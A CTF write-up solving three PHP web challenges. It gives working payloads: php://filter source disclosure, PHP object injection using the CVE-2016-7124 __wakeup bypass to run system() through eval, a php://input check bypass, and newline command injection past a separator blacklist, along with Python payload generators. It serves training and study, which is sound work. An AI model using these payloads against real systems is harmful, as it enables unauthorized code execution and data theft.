iChunQiu CTF (Season 4) December round: partial web write-up
I am still a beginner myself, and with finals approaching I only managed to solve some of the web challenges (to be continued…)
Challenge: nani
The page source contains a hint.
Build a php://filter payload to read user.php:
http://120.55.43.255:24719/index.php?file=php://filter/read=convert.base64-encode/resource=user.php
Base64-decode the response to get the source:
<?php
class convent{
var $warn = "No hacker.";
function __destruct(){
eval($this->warn);   // sink: whatever ends up in $warn is executed
}
function __wakeup(){
// runs on unserialize() and nulls every property, so it has to be bypassed
foreach(get_object_vars($this) as $k => $v) {
$this->$k = null;
}
}
}
$cmd = $_POST[cmd];
unserialize($cmd);
?>
Build the serialized payload. The s:N: field is the string length in bytes, so for whoami:
cmd=O:7:"convent":2:{s:4:"warn";s:17:"system("whoami");";}
and for ls:
cmd=O:7:"convent":2:{s:4:"warn";s:13:"system("ls");";}
Note that the object declares 2 properties while only one is supplied. On the affected PHP versions (CVE-2016-7124, fixed in 5.6.25 / 7.0.10) that mismatch makes unserialize() skip __wakeup(), so $warn is not nulled before __destruct() eval()s it.
Counting characters by hand is tedious, so just generate the string with Python.
Swap in the command that reads the flag file (and fix the s: length accordingly) to get the flag.
Challenge: admin
The page source contains a hint:
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
echo "hello admin!<br>";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
-->
Request the following, sending the literal string admin as the POST body so that file_get_contents("php://input") === "admin" passes:
http://120.55.43.255:28119/?user=php://input&file=php://filter/convert.base64-encode/resource=class.php&pass=1
Base64-decoding the output gives:
<?php
error_reporting(E_ALL & ~E_NOTICE);
class Read{//fffffflag.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "Awwwwwwwwwww man";
}
}
?>
Finally build a serialized Read object and pass it in pass (still POSTing admin; the s:62: length is for the wrapper string with no spaces in it):
http://localhost:8000/?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:62:"php://filter/read=convert.base64-encode/resource=fffffflag.php";}
Base64-decode the output to get the flag.
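Both the nani and admin payloads above are PHP serialized objects where the only fiddly part is the s:N: byte count. The generator below is an added example (my own code, not part of the original write-up) that does the counting and also reproduces the nani trick of declaring more properties than it supplies. The class and property names, the challenge host and the fffffflag.php file name all come from the write-up; nothing is sent, the script only prints the strings.

```python
# Added example: build PHP serialize() strings for the nani and admin
# challenges without counting characters by hand.
import urllib.parse


def php_serialize(value):
    """Serialize a Python str/int/bool/None the way PHP's serialize() does.
    PHP's s:N: is a *byte* length, so encode before measuring."""
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if value is None:
        return "N;"
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return 's:%d:"%s";' % (len(raw), value)
    raise TypeError("unsupported type: %r" % type(value))


def php_serialize_object(class_name, props, declared_count=None):
    """Serialize an object with the given public properties.

    declared_count lets you lie about the property count. On PHP before
    5.6.25 / 7.0.10 (CVE-2016-7124) a count larger than the number of
    properties actually present makes unserialize() skip __wakeup(), which
    is what nani needs: its __wakeup() nulls every property before
    __destruct() would eval() $warn.
    """
    if declared_count is None:
        declared_count = len(props)
    body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
    return 'O:%d:"%s":%d:{%s}' % (len(class_name), class_name, declared_count, body)


def nani_payload(command):
    """Payload for nani: eval($this->warn) runs system(<command>)."""
    warn = 'system("%s");' % command
    return php_serialize_object("convent", {"warn": warn}, declared_count=2)


def admin_payload(path="fffffflag.php"):
    """Payload for admin: Read::__toString() does file_get_contents($file)."""
    wrapper = "php://filter/read=convert.base64-encode/resource=" + path
    return php_serialize_object("Read", {"file": wrapper})


def admin_url(base, path="fffffflag.php"):
    """Full admin URL; urlencode() takes care of the quotes and semicolons."""
    params = {"user": "php://input", "file": "class.php", "pass": admin_payload(path)}
    return base + "/?" + urllib.parse.urlencode(params)


if __name__ == "__main__":
    print(nani_payload("whoami"))
    print(nani_payload("ls"))
    print(admin_payload())
    print(admin_url("http://120.55.43.255:28119"))
```

For nani, send the string URL-encoded in the POST body (for example with curl --data-urlencode "cmd=..."), since the quotes and semicolons would otherwise be mangled; for admin, keep POSTing the literal string admin so the php://input check still passes.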
Challenge: Ping
The page source contains a hint.
Request
http://120.55.43.255:21173/?path=php://filter/read=convert.base64-encode/resource=ping.php
with password[]=asdasd in the POST body.
Base64-decode the output to get the source:
<?php
if(isset($_REQUEST[ 'ip' ])) {
$target = trim($_REQUEST[ 'ip' ]);
$substitutions = array(
'&' => '',
';' => '',
'|' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
$cmd = shell_exec( 'ping -c 4 ' . $target );
echo $target;
echo "<pre>{$cmd}</pre>";
}
Now bypass the blacklist. The usual command separators are:
Linux: %0a, %0d, ;, &, |, &&, ||
Windows: %0a, &, |, %1a (an odd one: it acts as a command separator in .bat files)
Here ; & and | (and therefore && and ||) are all stripped, but a newline (%0a) is not, so the ip parameter only needs 127.0.0.1%0a followed by the command. Keep in mind that - is stripped too, so the injected command cannot take any flags. Finally just cat the flag file to get the flag.
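To see exactly what ping.php lets through, here is a small Python reproduction of its blacklist (an added example, not code from the write-up): it applies the same str_replace table in the same order, reports which separators survive, and URL-encodes a working ip= value. The flag file name flag is a guess on my part.

```python
# Added example: reproduce the ping.php blacklist and build a bypass payload.
import urllib.parse

# Same pairs, same order as the challenge's str_replace() call.
SUBSTITUTIONS = [
    ("&", ""), (";", ""), ("|", ""), ("-", ""), ("$", ""),
    ("(", ""), (")", ""), ("`", ""), ("||", ""),
]


def apply_filter(target):
    """Mimic PHP: trim(), then str_replace() with each pair in turn.
    The '||' pair is dead code, every '|' is already gone by the third pair."""
    target = target.strip()
    for needle, repl in SUBSTITUTIONS:
        target = target.replace(needle, repl)
    return target


def separators_passing_filter():
    """Separators that reach shell_exec() untouched. Only '\\n' (%0a) and
    '\\r' (%0d) survive, and sh does not treat '\\r' as a separator, so the
    newline is the one to use."""
    candidates = ["\n", "\r", ";", "&", "|", "&&", "||"]
    return [c for c in candidates if apply_filter("1" + c + "id") == "1" + c + "id"]


def build_ip_param(host, command):
    """ip= value that makes shell_exec() run 'ping -c 4 <host>' and then
    <command>. Raises if the blacklist would mangle the command, e.g. a
    '-' flag, which the filter silently strips."""
    raw = host + "\n" + command
    if apply_filter(raw) != raw:
        raise ValueError("command would be altered by the filter: %r" % command)
    return urllib.parse.quote(raw, safe="")


if __name__ == "__main__":
    print(separators_passing_filter())
    # flag file name is a guess
    print(build_ip_param("127.0.0.1", "cat flag"))
```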